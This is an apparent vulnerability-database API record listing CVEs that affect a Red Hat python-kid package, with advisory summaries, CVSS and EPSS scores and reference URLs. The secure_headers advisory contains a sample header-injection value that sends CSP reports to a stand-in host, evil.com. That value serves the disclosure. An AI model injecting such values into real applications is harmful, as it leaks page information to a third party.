Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:rpm/redhat/python-kid@0.9.6-11?arch=el7sat
Typerpm
Namespaceredhat
Namepython-kid
Version0.9.6-11
Qualifiers
arch el7sat
Subpath
Is_vulnerabletrue
Next_non_vulnerable_versionnull
Latest_non_vulnerable_versionnull
Affected_by_vulnerabilities
0
url VCID-1hff-pbpa-p3e5
vulnerability_id VCID-1hff-pbpa-p3e5
summary 
Limited header injection when using dynamic overrides with user input in RubyGems secure_headers
### Impact

If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection.

Upon seeing a newline in the header, rails will silently create a new `Content-Security-Policy` header with the remaining value of the original string. It will continue to create new headers for each newline.

e.g.

```ruby
override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])` 
```

would result in 

```
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: injected
Content-Security-Policy: rest-of-the-header
```

CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:

```ruby
override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"]) 
```
```
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: default-src 'none'; report-uri evil.com
Content-Security-Policy: rest-of-the-header
```

### Patches

This has been fixed in 6.3.0, 5.2.0, and 3.9.0

### Workarounds

```ruby
override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])
```

### References

https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c
[The effect of multiple policies](https://www.w3.org/TR/CSP3/#multiple-policies)

### For more information

If you have any questions or comments about this advisory:
* Open an issue in [this repo](https://github.com/twitter/secure_headers/security/advisories/new)
* DM us at @ndm on twitter
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-5216.json
reference_id
reference_type
scores
0
value 5.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-5216.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-5216
reference_id
reference_type
scores
0
value 0.00347
scoring_system epss
scoring_elements 0.57287
published_at 2026-04-13T12:55:00Z
1
value 0.00347
scoring_system epss
scoring_elements 0.57308
published_at 2026-04-12T12:55:00Z
2
value 0.00347
scoring_system epss
scoring_elements 0.57327
published_at 2026-04-11T12:55:00Z
3
value 0.00347
scoring_system epss
scoring_elements 0.57314
published_at 2026-04-09T12:55:00Z
4
value 0.00347
scoring_system epss
scoring_elements 0.57312
published_at 2026-04-08T12:55:00Z
5
value 0.00347
scoring_system epss
scoring_elements 0.57261
published_at 2026-04-07T12:55:00Z
6
value 0.00347
scoring_system epss
scoring_elements 0.57283
published_at 2026-04-04T12:55:00Z
7
value 0.00347
scoring_system epss
scoring_elements 0.57179
published_at 2026-04-01T12:55:00Z
8
value 0.00347
scoring_system epss
scoring_elements 0.5726
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-5216
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5216
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5216
3
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/secure_headers/CVE-2020-5216.yml
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/secure_headers/CVE-2020-5216.yml
4
reference_url https://github.com/twitter/secure_headers
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twitter/secure_headers
5
reference_url https://github.com/twitter/secure_headers/commit/301695706f6a70517c2a90c6ef9b32178440a2d0
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twitter/secure_headers/commit/301695706f6a70517c2a90c6ef9b32178440a2d0
6
reference_url https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3
scoring_elements
1
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-5216
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-5216
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1801286
reference_id 1801286
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1801286
9
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=949998
reference_id 949998
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=949998
10
reference_url https://github.com/advisories/GHSA-w978-rmpf-qmwg
reference_id GHSA-w978-rmpf-qmwg
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-w978-rmpf-qmwg
11
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
fixed_packages
aliases CVE-2020-5216, GHSA-w978-rmpf-qmwg
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1hff-pbpa-p3e5
1
url VCID-1xgz-hwng-n3eq
vulnerability_id VCID-1xgz-hwng-n3eq
summary 
Untrusted users can run pending migrations in production in Rails
There is a vulnerability in versions of Rails prior to 6.0.3.2 that allowed an untrusted user to run any pending migrations on a Rails app running in production.

This vulnerability has been assigned the CVE identifier CVE-2020-8185.

Versions Affected:  6.0.0 < rails < 6.0.3.2
Not affected:       Applications with `config.action_dispatch.show_exceptions = false` (this is not a default setting in production)
Fixed Versions:     rails >= 6.0.3.2

Impact
------

Using this issue, an attacker would be able to execute any migrations that are pending for a Rails app running in production mode. It is important to note that an attacker is limited to running migrations the application developer has already defined in their application and ones that have not already run.

Workarounds
-----------

Until such time as the patch can be applied, application developers should disable the ActionDispatch middleware in their production environment via a line such as this one in their config/environment/production.rb:

`config.middleware.delete ActionDispatch::ActionableExceptions`
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8185.json
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8185.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-8185
reference_id
reference_type
scores
0
value 0.00679
scoring_system epss
scoring_elements 0.71546
published_at 2026-04-13T12:55:00Z
1
value 0.00679
scoring_system epss
scoring_elements 0.71509
published_at 2026-04-01T12:55:00Z
2
value 0.00679
scoring_system epss
scoring_elements 0.71515
published_at 2026-04-02T12:55:00Z
3
value 0.00679
scoring_system epss
scoring_elements 0.71532
published_at 2026-04-04T12:55:00Z
4
value 0.00679
scoring_system epss
scoring_elements 0.71505
published_at 2026-04-07T12:55:00Z
5
value 0.00679
scoring_system epss
scoring_elements 0.71545
published_at 2026-04-08T12:55:00Z
6
value 0.00679
scoring_system epss
scoring_elements 0.71557
published_at 2026-04-09T12:55:00Z
7
value 0.00679
scoring_system epss
scoring_elements 0.7158
published_at 2026-04-11T12:55:00Z
8
value 0.00679
scoring_system epss
scoring_elements 0.71564
published_at 2026-04-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-8185
2
reference_url https://github.com/rails/rails/commit/2121b9d20b60ed503aa041ef7b926d331ed79fc2
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rails/rails/commit/2121b9d20b60ed503aa041ef7b926d331ed79fc2
3
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2020-8185.yml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2020-8185.yml
4
reference_url https://groups.google.com/g/rubyonrails-security/c/pAe9EV8gbM0
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements
1
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://groups.google.com/g/rubyonrails-security/c/pAe9EV8gbM0
5
reference_url https://hackerone.com/reports/899069
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://hackerone.com/reports/899069
6
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB
7
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-8185
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-8185
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1852380
reference_id 1852380
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1852380
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=964081
reference_id 964081
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=964081
11
reference_url https://github.com/advisories/GHSA-c6qr-h5vq-59jc
reference_id GHSA-c6qr-h5vq-59jc
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c6qr-h5vq-59jc
12
reference_url https://access.redhat.com/errata/RHSA-2021:1313
reference_id RHSA-2021:1313
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:1313
fixed_packages
aliases CVE-2020-8185, GHSA-c6qr-h5vq-59jc
risk_score 3.2
exploitability 0.5
weighted_severity 6.4
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1xgz-hwng-n3eq
2
url VCID-27wt-wmzc-1bc2
vulnerability_id VCID-27wt-wmzc-1bc2
summary django.contrib.auth.forms.AuthenticationForm in Django 2.0 before 2.0.2, and 1.11.8 and 1.11.9, allows remote attackers to obtain potentially sensitive information by leveraging data exposure from the confirm_login_allowed() method, as demonstrated by discovering whether a user account is inactive.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-6188.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-6188.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-6188
reference_id
reference_type
scores
0
value 0.00952
scoring_system epss
scoring_elements 0.76383
published_at 2026-04-13T12:55:00Z
1
value 0.00952
scoring_system epss
scoring_elements 0.76388
published_at 2026-04-12T12:55:00Z
2
value 0.00952
scoring_system epss
scoring_elements 0.7641
published_at 2026-04-11T12:55:00Z
3
value 0.00952
scoring_system epss
scoring_elements 0.76384
published_at 2026-04-09T12:55:00Z
4
value 0.00952
scoring_system epss
scoring_elements 0.76371
published_at 2026-04-08T12:55:00Z
5
value 0.00952
scoring_system epss
scoring_elements 0.76338
published_at 2026-04-07T12:55:00Z
6
value 0.00952
scoring_system epss
scoring_elements 0.76358
published_at 2026-04-04T12:55:00Z
7
value 0.00952
scoring_system epss
scoring_elements 0.76327
published_at 2026-04-02T12:55:00Z
8
value 0.00952
scoring_system epss
scoring_elements 0.76324
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-6188
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6188
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6188
3
reference_url https://github.com/advisories/GHSA-rf4j-j272-fj86
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-rf4j-j272-fj86
4
reference_url https://github.com/django/django
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/django/django
5
reference_url https://github.com/django/django/commit/57b95fedad5e0b83fc9c81466b7d1751c6427aae
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/django/django/commit/57b95fedad5e0b83fc9c81466b7d1751c6427aae
6
reference_url https://github.com/django/django/commit/c37bb28677295f6edda61d8ac461014ef0d3aeb2
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/django/django/commit/c37bb28677295f6edda61d8ac461014ef0d3aeb2
7
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2018-4.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2018-4.yaml
8
reference_url https://usn.ubuntu.com/3559-1
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/3559-1
9
reference_url https://usn.ubuntu.com/3559-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/3559-1/
10
reference_url https://web.archive.org/web/20200517143909/http://www.securitytracker.com/id/1040422
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20200517143909/http://www.securitytracker.com/id/1040422
11
reference_url https://www.djangoproject.com/weblog/2018/feb/01/security-releases
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.djangoproject.com/weblog/2018/feb/01/security-releases
12
reference_url https://www.djangoproject.com/weblog/2018/feb/01/security-releases/
reference_id
reference_type
scores
url https://www.djangoproject.com/weblog/2018/feb/01/security-releases/
13
reference_url http://www.securitytracker.com/id/1040422
reference_id
reference_type
scores
url http://www.securitytracker.com/id/1040422
14
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1538793
reference_id 1538793
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1538793
15
reference_url https://security.archlinux.org/AVG-624
reference_id AVG-624
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-624
16
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-6188
reference_id CVE-2018-6188
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-6188
fixed_packages
aliases CVE-2018-6188, GHSA-rf4j-j272-fj86, PYSEC-2018-4
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-27wt-wmzc-1bc2
3
url VCID-2g54-3acq-pbha
vulnerability_id VCID-2g54-3acq-pbha
summary rubygem-foreman_ansible: "User input" entry from Job Invocation may contain sensitive data
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-10716.json
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-10716.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-10716
reference_id
reference_type
scores
0
value 0.00156
scoring_system epss
scoring_elements 0.36361
published_at 2026-04-01T12:55:00Z
1
value 0.00156
scoring_system epss
scoring_elements 0.36535
published_at 2026-04-02T12:55:00Z
2
value 0.00156
scoring_system epss
scoring_elements 0.36568
published_at 2026-04-04T12:55:00Z
3
value 0.00156
scoring_system epss
scoring_elements 0.36406
published_at 2026-04-07T12:55:00Z
4
value 0.00156
scoring_system epss
scoring_elements 0.36457
published_at 2026-04-08T12:55:00Z
5
value 0.00156
scoring_system epss
scoring_elements 0.36478
published_at 2026-04-09T12:55:00Z
6
value 0.00156
scoring_system epss
scoring_elements 0.36485
published_at 2026-04-11T12:55:00Z
7
value 0.00156
scoring_system epss
scoring_elements 0.3645
published_at 2026-04-12T12:55:00Z
8
value 0.00156
scoring_system epss
scoring_elements 0.36428
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-10716
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1827300
reference_id 1827300
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1827300
3
reference_url https://access.redhat.com/errata/RHSA-2020:1454
reference_id RHSA-2020:1454
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1454
fixed_packages
aliases CVE-2020-10716
risk_score 1.9
exploitability 0.5
weighted_severity 3.9
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2g54-3acq-pbha
4
url VCID-2y5d-qg7z-2kdg
vulnerability_id VCID-2y5d-qg7z-2kdg
summary QOS.ch Logback before 1.2.0 has a serialization vulnerability affecting the SocketServer and ServerSocketReceiver components.
references
0
reference_url https://access.redhat.com/errata/RHSA-2017:1675
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:1675
1
reference_url https://access.redhat.com/errata/RHSA-2017:1676
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:1676
2
reference_url https://access.redhat.com/errata/RHSA-2017:1832
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:1832
3
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
4
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-5929.json
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-5929.json
5
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-5929
reference_id
reference_type
scores
0
value 0.10144
scoring_system epss
scoring_elements 0.93086
published_at 2026-04-04T12:55:00Z
1
value 0.10144
scoring_system epss
scoring_elements 0.93083
published_at 2026-04-02T12:55:00Z
2
value 0.10144
scoring_system epss
scoring_elements 0.93073
published_at 2026-04-01T12:55:00Z
3
value 0.10144
scoring_system epss
scoring_elements 0.93102
published_at 2026-04-13T12:55:00Z
4
value 0.10144
scoring_system epss
scoring_elements 0.93103
published_at 2026-04-11T12:55:00Z
5
value 0.10144
scoring_system epss
scoring_elements 0.931
published_at 2026-04-12T12:55:00Z
6
value 0.10144
scoring_system epss
scoring_elements 0.93085
published_at 2026-04-07T12:55:00Z
7
value 0.10144
scoring_system epss
scoring_elements 0.93093
published_at 2026-04-08T12:55:00Z
8
value 0.10144
scoring_system epss
scoring_elements 0.93098
published_at 2026-04-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-5929
6
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5929
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5929
7
reference_url https://github.com/qos-ch/logback
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/qos-ch/logback
8
reference_url https://github.com/qos-ch/logback/commit/f46044b805bca91efe5fd6afe52257cd02f775f8
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/qos-ch/logback/commit/f46044b805bca91efe5fd6afe52257cd02f775f8
9
reference_url https://lists.apache.org/thread.html/18d509024d9aeb07f0e9579066f80bf5d4dcf20467b0c240043890d1@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/18d509024d9aeb07f0e9579066f80bf5d4dcf20467b0c240043890d1@%3Ccommits.cassandra.apache.org%3E
10
reference_url https://lists.apache.org/thread.html/a6db61616180d73711d6db25703085940026e2dbc40f153f9d22b203@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/a6db61616180d73711d6db25703085940026e2dbc40f153f9d22b203@%3Ccommits.cassandra.apache.org%3E
11
reference_url https://lists.apache.org/thread.html/fa4eaaa6ff41ac6f79811e053c152ee89b7c5da8a6ac848ae97df67f@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/fa4eaaa6ff41ac6f79811e053c152ee89b7c5da8a6ac848ae97df67f@%3Ccommits.cassandra.apache.org%3E
12
reference_url https://lists.apache.org/thread.html/r0bb19330e48d5ad784fa20dacba9e5538d8d60f5cd9142e0f1432b4b@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r0bb19330e48d5ad784fa20dacba9e5538d8d60f5cd9142e0f1432b4b@%3Ccommits.cassandra.apache.org%3E
13
reference_url https://lists.apache.org/thread.html/r2a08573ddee4a86dc96d469485a5843a01710ee0dc2078dfca410c79@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r2a08573ddee4a86dc96d469485a5843a01710ee0dc2078dfca410c79@%3Ccommits.cassandra.apache.org%3E
14
reference_url https://lists.apache.org/thread.html/r2c2d57ca180e8173c90fe313ddf8eabbdcf8e3ae196f8b9f42599790@%3Ccommits.mnemonic.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r2c2d57ca180e8173c90fe313ddf8eabbdcf8e3ae196f8b9f42599790@%3Ccommits.mnemonic.apache.org%3E
15
reference_url https://lists.apache.org/thread.html/r397bf63783240fbb5713389d3f889d287ae0c11509006700ac720037@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r397bf63783240fbb5713389d3f889d287ae0c11509006700ac720037@%3Ccommits.cassandra.apache.org%3E
16
reference_url https://lists.apache.org/thread.html/r4673642893562c58cbee60c151ded6c077e8a2d02296e862224a9161@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
